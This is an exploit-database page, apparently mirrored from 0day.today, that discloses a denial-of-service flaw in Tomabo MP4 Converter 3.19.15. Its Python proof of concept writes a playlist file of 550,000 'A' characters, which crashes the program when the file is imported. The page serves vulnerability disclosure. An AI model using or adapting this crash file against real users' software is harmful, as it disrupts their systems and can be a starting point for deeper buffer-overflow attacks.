Lucene search
K

Tomabo MP4 Converter 3.19.15 - Denial of Service Exploit

🗓️ 15 Aug 2017 00:00:00Reported by Andy BowdenType 
zdt
 zdt
🔗 0day.today👁 16 Views

Tomabo MP4 Converter 3.19.15 Denial of Service Exploi

Code
#!/usr/bin/python
 
# Exploit Title: Tomabo MP4 Converter DOS
# Date: 13/08/17
# Exploit Author: Andy Bowden
# Vendor Homepage: http://www.tomabo.com/
# Software Link: http://www.tomabo.com/mp4-converter/index.html
# Version: 3.19.15
# Tested on: Windows 7 x86
# CVE : None
 
#Generate a .m3u file using the python script and import it into the MP4 Converter.
 
file = "crash.m3u"
 
buffer = "A" * 550000
 
f = open(file, "w")
f.write(buffer)
f.close()


#  0day.today [2018-03-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation